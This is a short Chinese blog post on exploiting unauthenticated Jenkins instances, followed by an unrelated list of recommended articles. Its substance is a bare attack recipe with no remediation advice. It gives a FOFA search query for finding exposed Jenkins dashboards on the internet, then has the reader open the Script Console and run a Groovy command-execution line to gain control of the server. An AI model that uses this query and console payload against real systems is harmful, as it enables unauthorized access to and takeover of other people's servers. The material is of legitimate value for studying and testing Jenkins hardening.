Jenkins未授权访问漏洞

lhdbk______2024-08-08 12:59
5.Jenkins未授权访问漏洞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

一、使用以下fofa语法进行产品搜索
复制代码 
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
二:在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令

println "whoami".execute().text

相关推荐
小刘|10 分钟前
Spring AI Alibaba 集成和风天气 API 实战
java·服务器·前端
星星在线29 分钟前
我是怎么把页面图片流量砍掉一半的
前端·javascript
木叶子---1 小时前
前端打包出错
前端·人工智能·tensorflow
JAVA面经实录9171 小时前
前端系统化学习计划表(含完整知识思维导图)
前端·学习
本末倒置1832 小时前
开发了一个所见所得的md编辑器,致敬Typora大佬
前端
kyriewen2 小时前
TypeScript 高级类型:我用 infer 写了一个类型安全的 EventBus,终于搞懂了泛型约束
前端·javascript·typescript
UXbot2 小时前
原型设计工具如何帮助新人快速进入产品行业?
前端·低代码·ui·交互·团队开发·原型模式·web app
黄敬峰3 小时前
从 DFS 遍历到抖音推荐算法:前端工程师的硬核复习笔记
前端
zach3 小时前
网页中的虚拟滚动技术是不是源自IOS中的tableview的机制
前端
热门推荐
012026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?022026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04HTTP 与 HTTPS 的区别:从原理到实战详解05【AI】2026 年具身智能模型和世界模型总结06GitHub 镜像站点07上线仅72小时被强制下架:Claude Fable 5 的短命08AI科技热点日报 | 2026年6月1日09Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析10Codex 下载安装指南:Windows 和 macOS 官方版下载